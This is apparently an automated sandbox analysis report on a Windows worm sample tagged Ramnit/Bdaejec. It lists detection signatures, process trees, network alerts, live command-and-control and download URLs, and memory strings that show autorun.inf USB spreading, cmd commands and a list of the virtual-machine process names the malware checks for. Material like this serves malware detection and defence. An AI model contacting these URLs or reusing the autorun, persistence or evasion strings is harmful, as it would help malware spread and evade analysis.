Edit tour

Windows Analysis Report
LisectAVT_2403002B_290.exe

Overview

General Information

Sample name:	LisectAVT_2403002B_290.exe
Analysis ID:	1481855
MD5:	8da4d99ebba9a59fa372eefd2556860c
SHA1:	658f27ff1ccc2b57eeaaf98ab469276efe9c8c51
SHA256:	5e174f9e0b7b914a4717abc076ac00b3976e7a9a4abce6ca4170c8f267624c3c
Tags:	exeWormRamnit
Infos:

Detection

Bdaejec

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Yara detected Bdaejec

AI detected suspicious sample

Changes security center settings (notifications, updates, antivirus, firewall)

Contain functionality to detect virtual machines

Creates an autostart registry key pointing to binary in C:\Windows

Disables Windows system restore

Drops executables to the windows directory (C:\Windows) and starts them

Found evasive API chain (may stop execution after checking mutex)

Found evasive API chain (may stop execution after checking volume information)

Hides that the sample has been downloaded from the Internet (zone.identifier)

Infects executable files (exe, dll, sys, html)

Machine Learning detection for dropped file

Machine Learning detection for sample

PE file contains section with special chars

PE file has a writeable .text section

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to resolve many domain names, but no domain seems valid

Uses known network protocols on non-standard ports

AV process strings found (often used to terminate AV products)

Connects to many different domains

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to create guard pages, often used to hinder reverse usering and debugging

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Entry point lies outside standard sections

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evaded block containing many API calls

Found evasive API chain (date check)

Found evasive API chain (may stop execution after accessing registry keys)

Found evasive API chain (may stop execution after checking a module file name)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Installs a raw input device (often for capturing keystrokes)

May infect USB drives

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

One or more processes crash

PE file contains executable resources (Code or Archives)

PE file contains sections with non-standard names

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses the system / local time for branch decision (may execute only at specific dates)

Classification

Process Tree

System is w10x64

LisectAVT_2403002B_290.exe (PID: 6732 cmdline: "C:\Users\user\Desktop\LisectAVT_2403002B_290.exe" MD5: 8DA4D99EBBA9A59FA372EEFD2556860C)

XBVdJN.exe (PID: 6516 cmdline: C:\Users\user\AppData\Local\Temp\XBVdJN.exe MD5: F7D21DE5C4E81341ECCD280C11DDCC9A)

WerFault.exe (PID: 5716 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6516 -s 1584 MD5: C31336C1EFC2CCB44B4326EA793040F2)

winsvcs.exe (PID: 2784 cmdline: C:\Windows\94000696690303050\winsvcs.exe MD5: 8DA4D99EBBA9A59FA372EEFD2556860C)

winsvcs.exe (PID: 6200 cmdline: "C:\Windows\94000696690303050\winsvcs.exe" MD5: 8DA4D99EBBA9A59FA372EEFD2556860C)

XBVdJN.exe (PID: 6256 cmdline: C:\Users\user\AppData\Local\Temp\XBVdJN.exe MD5: F7D21DE5C4E81341ECCD280C11DDCC9A)

cmd.exe (PID: 1944 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\05c412c7.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 2688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

winsvcs.exe (PID: 3796 cmdline: "C:\Windows\94000696690303050\winsvcs.exe" MD5: 8DA4D99EBBA9A59FA372EEFD2556860C)

XBVdJN.exe (PID: 3768 cmdline: C:\Users\user\AppData\Local\Temp\XBVdJN.exe MD5: F7D21DE5C4E81341ECCD280C11DDCC9A)

cmd.exe (PID: 3792 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\55fb1e02.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 3852 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
Process Memory Space: XBVdJN.exe PID: 6516	JoeSecurity_Bdaejec	Yara detected Bdaejec	Joe Security
Process Memory Space: XBVdJN.exe PID: 6256	JoeSecurity_Bdaejec	Yara detected Bdaejec	Joe Security
Process Memory Space: XBVdJN.exe PID: 3768	JoeSecurity_Bdaejec	Yara detected Bdaejec	Joe Security

Sigma Signatures

System Summary

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Windows\94000696690303050\winsvcs.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\LisectAVT_2403002B_290.exe, ProcessId: 6732, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft Windows Services

Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Windows\94000696690303050\winsvcs.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\LisectAVT_2403002B_290.exe, ProcessId: 6732, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft Windows Services

Snort Signatures

⊘No Snort rule has matched

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update - Source IP: 192.168.2.6 - Destination IP: 20.42.73.29

Timestamp:	2024-07-25T15:13:30.018479+0200
SID:	2028371
Source Port:	49726
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ETPRO MALWARE Common Downloader Header Pattern UH - Source IP: 192.168.2.6 - Destination IP: 44.221.84.105

Timestamp:	2024-07-25T15:15:33.325593+0200
SID:	2803274
Source Port:	49756
Destination Port:	80
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ETPRO MALWARE Common Downloader Header Pattern UH - Source IP: 192.168.2.6 - Destination IP: 92.246.89.93

Timestamp:	2024-07-25T15:15:13.424683+0200
SID:	2803274
Source Port:	49753
Destination Port:	80
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ETPRO MALWARE Backdoor.Win32/Bdaejec.A CnC Domain in DNS Lookup - Source IP: 192.168.2.6 - Destination IP: 1.1.1.1

Timestamp:	2024-07-25T15:13:19.352778+0200
SID:	2838522
Source Port:	61964
Destination Port:	53
Protocol:	UDP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin - Source IP: 192.168.2.6 - Destination IP: 44.221.84.105

Timestamp:	2024-07-25T15:13:51.355961+0200
SID:	2807908
Source Port:	49738
Destination Port:	799
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Common Downloader Header Pattern UH - Source IP: 192.168.2.6 - Destination IP: 92.246.89.93

Timestamp:	2024-07-25T15:14:38.021714+0200
SID:	2803274
Source Port:	49747
Destination Port:	80
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst - Source IP: 34.218.204.173 - Destination IP: 192.168.2.6

Timestamp:	2024-07-25T15:16:11.428877+0200
SID:	2037771
Source Port:	80
Destination Port:	49764
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET Threatview.io High Confidence Cobalt Strike C2 IP group 3 - Source IP: 74.119.239.234 - Destination IP: 192.168.2.6

Timestamp:	2024-07-25T15:16:36.375930+0200
SID:	2527002
Source Port:	80
Destination Port:	49770
Protocol:	TCP
Classtype:	Misc Attack

ETPRO MALWARE Common Downloader Header Pattern UH - Source IP: 192.168.2.6 - Destination IP: 170.39.226.155

Timestamp:	2024-07-25T15:13:42.539489+0200
SID:	2803274
Source Port:	49733
Destination Port:	80
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst - Source IP: 44.221.84.105 - Destination IP: 192.168.2.6

Timestamp:	2024-07-25T15:14:50.224302+0200
SID:	2037771
Source Port:	80
Destination Port:	49749
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Common Downloader Header Pattern UH - Source IP: 192.168.2.6 - Destination IP: 74.119.239.234

Timestamp:	2024-07-25T15:16:57.852843+0200
SID:	2803274
Source Port:	49770
Destination Port:	80
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ETPRO MALWARE Common Downloader Header Pattern UH - Source IP: 192.168.2.6 - Destination IP: 54.244.188.177

Timestamp:	2024-07-25T15:16:22.126954+0200
SID:	2803274
Source Port:	49767
Destination Port:	80
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin - Source IP: 192.168.2.6 - Destination IP: 44.221.84.105

Timestamp:	2024-07-25T15:13:41.635043+0200
SID:	2807908
Source Port:	49731
Destination Port:	799
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Common Downloader Header Pattern UH - Source IP: 192.168.2.6 - Destination IP: 44.213.104.86

Timestamp:	2024-07-25T15:16:02.561286+0200
SID:	2803274
Source Port:	49762
Destination Port:	80
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ETPRO MALWARE Common Downloader Header Pattern UH - Source IP: 192.168.2.6 - Destination IP: 18.141.10.107

Timestamp:	2024-07-25T15:15:59.589424+0200
SID:	2803274
Source Port:	49761
Destination Port:	80
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ETPRO MALWARE Common Downloader Header Pattern UH - Source IP: 192.168.2.6 - Destination IP: 208.100.26.245

Timestamp:	2024-07-25T15:15:22.630192+0200
SID:	2803274
Source Port:	49754
Destination Port:	80
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow - Source IP: 13.85.23.86 - Destination IP: 192.168.2.6

Timestamp:	2024-07-25T15:13:37.565241+0200
SID:	2022930
Source Port:	443
Destination Port:	49729
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Common Downloader Header Pattern UH - Source IP: 192.168.2.6 - Destination IP: 185.215.113.66

Timestamp:	2024-07-25T15:15:47.481369+0200
SID:	2803274
Source Port:	49760
Destination Port:	80
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ETPRO MALWARE Common Downloader Header Pattern UH - Source IP: 192.168.2.6 - Destination IP: 54.244.188.177

Timestamp:	2024-07-25T15:16:04.594112+0200
SID:	2803274
Source Port:	49763
Destination Port:	80
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin - Source IP: 192.168.2.6 - Destination IP: 44.221.84.105

Timestamp:	2024-07-25T15:13:24.873191+0200
SID:	2807908
Source Port:	49724
Destination Port:	799
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst - Source IP: 44.213.104.86 - Destination IP: 192.168.2.6

Timestamp:	2024-07-25T15:16:03.569322+0200
SID:	2037771
Source Port:	80
Destination Port:	49762
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst - Source IP: 18.141.10.107 - Destination IP: 192.168.2.6

Timestamp:	2024-07-25T15:16:00.606808+0200
SID:	2037771
Source Port:	80
Destination Port:	49761
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Common Downloader Header Pattern UH - Source IP: 192.168.2.6 - Destination IP: 34.218.204.173

Timestamp:	2024-07-25T15:16:10.422241+0200
SID:	2803274
Source Port:	49764
Destination Port:	80
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin - Source IP: 192.168.2.6 - Destination IP: 44.221.84.105

Timestamp:	2024-07-25T15:13:47.058273+0200
SID:	2807908
Source Port:	49737
Destination Port:	799
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst - Source IP: 13.251.16.150 - Destination IP: 192.168.2.6

Timestamp:	2024-07-25T15:15:46.397489+0200
SID:	2037771
Source Port:	80
Destination Port:	49759
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Common Downloader Header Pattern UH - Source IP: 192.168.2.6 - Destination IP: 92.246.89.93

Timestamp:	2024-07-25T15:14:28.521053+0200
SID:	2803274
Source Port:	49742
Destination Port:	80
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ETPRO MALWARE Common Downloader Header Pattern UH - Source IP: 192.168.2.6 - Destination IP: 92.246.89.93

Timestamp:	2024-07-25T15:14:59.237828+0200
SID:	2803274
Source Port:	49751
Destination Port:	80
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin - Source IP: 192.168.2.6 - Destination IP: 44.221.84.105

Timestamp:	2024-07-25T15:13:53.993201+0200
SID:	2807908
Source Port:	49739
Destination Port:	799
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Common Downloader Header Pattern UH - Source IP: 192.168.2.6 - Destination IP: 13.251.16.150

Timestamp:	2024-07-25T15:15:45.378020+0200
SID:	2803274
Source Port:	49759
Destination Port:	80
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow - Source IP: 13.85.23.86 - Destination IP: 192.168.2.6

Timestamp:	2024-07-25T15:14:15.205118+0200
SID:	2022930
Source Port:	443
Destination Port:	49744
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Common Downloader Header Pattern UH - Source IP: 192.168.2.6 - Destination IP: 44.221.84.105

Timestamp:	2024-07-25T15:14:49.123532+0200
SID:	2803274
Source Port:	49749
Destination Port:	80
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ETPRO MALWARE Common Downloader Header Pattern UH - Source IP: 192.168.2.6 - Destination IP: 92.63.197.48

Timestamp:	2024-07-25T15:14:05.816494+0200
SID:	2803274
Source Port:	49736
Destination Port:	80
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin - Source IP: 192.168.2.6 - Destination IP: 44.221.84.105

Timestamp:	2024-07-25T15:13:19.951471+0200
SID:	2807908
Source Port:	49722
Destination Port:	799
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin - Source IP: 192.168.2.6 - Destination IP: 44.221.84.105

Timestamp:	2024-07-25T15:13:44.441888+0200
SID:	2807908
Source Port:	49735
Destination Port:	799
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Common Downloader Header Pattern UH - Source IP: 192.168.2.6 - Destination IP: 54.244.188.177

Timestamp:	2024-07-25T15:17:05.252309+0200
SID:	2803274
Source Port:	49771
Destination Port:	80
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst - Source IP: 54.244.188.177 - Destination IP: 192.168.2.6

Timestamp:	2024-07-25T15:16:04.594153+0200
SID:	2037771
Source Port:	80
Destination Port:	49763
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst - Source IP: 44.213.104.86 - Destination IP: 192.168.2.6

Timestamp:	2024-07-25T15:15:29.430204+0200
SID:	2037771
Source Port:	80
Destination Port:	49755
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Common Downloader Header Pattern UH - Source IP: 192.168.2.6 - Destination IP: 54.244.188.177

Timestamp:	2024-07-25T15:16:30.553398+0200
SID:	2803274
Source Port:	49769
Destination Port:	80
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ETPRO MALWARE Common Downloader Header Pattern UH - Source IP: 192.168.2.6 - Destination IP: 44.213.104.86

Timestamp:	2024-07-25T15:15:28.415157+0200
SID:	2803274
Source Port:	49755
Destination Port:	80
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ET MALWARE Possible Zeus GameOver/FluBot Related DGA NXDOMAIN Responses - Source IP: 1.1.1.1 - Destination IP: 192.168.2.6

Timestamp:	2024-07-25T15:16:27.854244+0200
SID:	2018316
Source Port:	53
Destination Port:	51387
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Common Downloader Header Pattern UH - Source IP: 192.168.2.6 - Destination IP: 54.244.188.177

Timestamp:	2024-07-25T15:16:13.644028+0200
SID:	2803274
Source Port:	49766
Destination Port:	80
Protocol:	TCP
Classtype:	Potentially Bad Traffic

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: LisectAVT_2403002B_290.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://ddos.dnsnb8.net:799/cj//k3.rar	URL Reputation: Label: malware
Source: http://ddos.dnsnb8.net/	URL Reputation: Label: malware
Source: http://slpsrgpsrhojifdij.biz/tldr.php?newinf=1	Avira URL Cloud: Label: malware
Source: http://fiiauediehduefuge.ru/tldr.php?newinf=1	Avira URL Cloud: Label: malware
Source: http://srndndubsbsifurfd.biz/	Avira URL Cloud: Label: malware
Source: http://afeifieuuufufufuf.net/	Avira URL Cloud: Label: malware
Source: http://slpsrgpsrhojifdij.biz/tldr.php?newinf=1O	Avira URL Cloud: Label: malware
Source: http://eofihsishihiursgu.su/	Avira URL Cloud: Label: malware
Source: http://eoroooskfogihisrg.in/tldr.php?newinf=1	Avira URL Cloud: Label: malware
Source: http://nousiieiffgogogoo.com/tldr.php?newinf=1	Avira URL Cloud: Label: malware
Source: http://eoroooskfogihisrg.biz/tldr.php?newinf=1K	Avira URL Cloud: Label: malware
Source: http://eiifngjfksisiufjf.com/tldr.php?newinf=1	Avira URL Cloud: Label: malware
Source: http://fifiehsueuufidhfi.net/tldr.php?newinf=1P	Avira URL Cloud: Label: malware
Source: http://srndndubsbsifurfd.in/tldr.php?newinf=19h	Avira URL Cloud: Label: malware
Source: http://eoroooskfogihisrg.biz/tldr.php?newinf=1T	Avira URL Cloud: Label: malware
Source: http://aiiaiafrzrueuedur.info/	Avira URL Cloud: Label: malware
Source: http://eiifngjfksisiufjf.com/	Avira URL Cloud: Label: malware
Source: http://srndndubsbsifurfd.ru/tldr.php?newinf=1	Avira URL Cloud: Label: malware
Source: http://fifiehsueuufidhfi.net/	Avira URL Cloud: Label: malware
Source: http://slpsrgpsrhojifdij.com/tldr.php?newinf=1	Avira URL Cloud: Label: malware
Source: http://eoroooskfogihisrg.com/	Avira URL Cloud: Label: malware
Source: http://eoroooskfogihisrg.com/tldr.php?newinf=1w	Avira URL Cloud: Label: malware
Source: http://iuirshriuisruruuf.biz/tldr.php?newinf=1	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k3.rarw	Avira URL Cloud: Label: phishing
Source: http://afeifieuuufufufuf.in/tldr.php?newinf=1	Avira URL Cloud: Label: malware
Source: http://nousiieiffgogogoo.su/tldr.php?newinf=1oh	Avira URL Cloud: Label: malware
Source: http://eoroooskfogihisrg.info/	Avira URL Cloud: Label: malware
Source: http://iuirshriuisruruuf.com/	Avira URL Cloud: Label: malware
Source: http://noeuaoenriusfiruu.in/	Avira URL Cloud: Label: malware
Source: http://srndndubsbsifurfd.biz/tldr.php?newinf=1Gj9	Avira URL Cloud: Label: malware
Source: http://srndndubsbsifurfd.su/http://fiiauediehduefuge.su/http://nousiieiffgogogoo.su/http://fifiehsue	Avira URL Cloud: Label: malware
Source: http://slpsrgpsrhojifdij.biz/	Avira URL Cloud: Label: malware
Source: http://nousiieiffgogogoo.ru/	Avira URL Cloud: Label: malware
Source: http://afeifieuuufufufuf.in/	Avira URL Cloud: Label: malware
Source: http://eoroooskfogihisrg.net/tldr.php?newinf=1YA	Avira URL Cloud: Label: malware
Source: http://iuirshriuisruruuf.ru/	Avira URL Cloud: Label: malware
Source: http://fuaiuebndieufeufu.in/tldr.php?newinf=1	Avira URL Cloud: Label: malware
Source: http://eofihsishihiursgu.com/tldr.php?newinf=1	Avira URL Cloud: Label: malware
Source: http://fifiehsueuufidhfi.net/tldr.php?newinf=1	Avira URL Cloud: Label: malware
Source: http://aiiaiafrzrueuedur.in/	Avira URL Cloud: Label: malware
Source: http://fiiauediehduefuge.com/tldr.php?newinf=1Ck%	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k3.rar:	Avira URL Cloud: Label: malware
Source: http://eoroooskfogihisrg.in/tldr.php?newinf=15i%	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.rark8	Avira URL Cloud: Label: malware
Source: http://srndndubsbsifurfd.net/tldr.php?newinf=1A	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k4.rarT	Avira URL Cloud: Label: phishing
Source: http://fuaiuebndieufeufu.net/tldr.php?newinf=1	Avira URL Cloud: Label: malware
Source: http://iuirshriuisruruuf.net/	Avira URL Cloud: Label: malware
Source: http://srndndubsbsifurfd.su/tldr.php?newinf=1	Avira URL Cloud: Label: malware
Source: http://noeuaoenriusfiruu.net/tldr.php?newinf=1=BZ	Avira URL Cloud: Label: malware
Source: http://nousiieiffgogogoo.su/	Avira URL Cloud: Label: malware
Source: http://fuaiuebndieufeufu.su/tldr.php?newinf=1	Avira URL Cloud: Label: malware
Source: http://fifiehsueuufidhfi.su/	Avira URL Cloud: Label: malware
Source: http://afeifieuuufufufuf.net/tldr.php?newinf=1	Avira URL Cloud: Label: malware
Source: http://aiiaiafrzrueuedur.biz/tldr.php?newinf=1	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k2.rarh?p	Avira URL Cloud: Label: malware
Source: http://srndndubsbsifurfd.in/tldr.php?newinf=1	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Avira: detection malicious, Label: TR/Dldr.Small.Z.haljq
Source: C:\Users\user\AppData\Local\Temp\Windows Archive Manager.exe	Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\Windows\94000696690303050\winsvcs.exe	Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\Program Files\7-Zip\Uninstall.exe	Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Avira: detection malicious, Label: W32/Jadtre.B

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\Windows Archive Manager.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Joe Sandbox ML: detected
Source: C:\Windows\94000696690303050\winsvcs.exe	Joe Sandbox ML: detected
Source: C:\Program Files\7-Zip\Uninstall.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: LisectAVT_2403002B_290.exe

Joe Sandbox ML: detected

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exe	Unpacked PE file: 0.2.LisectAVT_2403002B_290.exe.400000.0.unpack
Source: C:\Windows\94000696690303050\winsvcs.exe	Unpacked PE file: 9.2.winsvcs.exe.400000.0.unpack
Source: C:\Windows\94000696690303050\winsvcs.exe	Unpacked PE file: 14.2.winsvcs.exe.400000.0.unpack

Source: LisectAVT_2403002B_290.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source:	Binary string: C:\Us .pdb source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000742000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.00000000007C0000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp
Source:	Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.1.dr

Spreading

Infects executable files (exe, dll, sys, html)

Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	System file written: C:\Program Files\7-Zip\Uninstall.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	System file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Jump to behavior

Source: LisectAVT_2403002B_290.exe	Binary or memory string: %ls\autorun.inf
Source: LisectAVT_2403002B_290.exe	Binary or memory string: [autorun] open=_\DeviceManager.exe UseAutoPlay=1
Source: LisectAVT_2403002B_290.exe	Binary or memory string: autorun.inf
Source: LisectAVT_2403002B_290.exe	Binary or memory string: [autorun]open=_\DeviceManager.exeUseAutoPlay=1
Source: LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007FC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [autorun]
Source: LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007FC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: s.exeo.exe\public_html\htdocs\httpdocs\wwwroot\ftproot\share\income\upload...Recycle.Bin.zip.rarWindows Archive Manager.exe.7zWindows Archive Manager.exe.tarWindows Archive Manager.exe.exe%temp%%ls\Windows Archive Manager.exe%windir%\system32\cmd.exe%ls*/c start _ & _\DeviceManager.exe & exit%ls\%s.lnk%ls.lnk%ls\_%ls\_\DeviceManager.exe%ls\autorun.infrbshell32.dllB:\shell32.dllB:\w[autorun]
Source: LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007FC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: s.exeo.exe\public_html\htdocs\httpdocs\wwwroot\ftproot\share\income\upload...Recycle.Bin.zip.rarWindows Archive Manager.exe.7zWindows Archive Manager.exe.tarWindows Archive Manager.exe.exe%temp%%ls\Windows Archive Manager.exe%windir%\system32\cmd.exe%ls*/c start _ & _\DeviceManager.exe & exit%ls\%s.lnk%ls.lnk%ls\_%ls\_\DeviceManager.exe%ls\autorun.infrbshell32.dllB:\shell32.dllB:\w[autorun]
Source: LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007FC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: UseAutoPlay=1.lnk.vbs.bat.js.scr.com.jse.cmd.pif.jar.dll%ls\%s.lnkautorun.inf_%ls\%s%s\_\%ls.../c rmdir /q /s "%ls"cmd.exe/c move /y "%ls", "%ls"cmd.exerb%hs%temp%%ls\%d%d.exeMozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0%ls:Zone.Identifier%ls\%d%d.exe%ls:Zone.Identifierpython.exepythonw.exeprl_cc.exeprl_tools.exevmsrvc.exevmusrvc.exexenservice.exevboxservice.exevboxtray.exevboxcontrol.exevmwareservice.exevmwaretray.exetpautoco
Source: LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: [autorun]
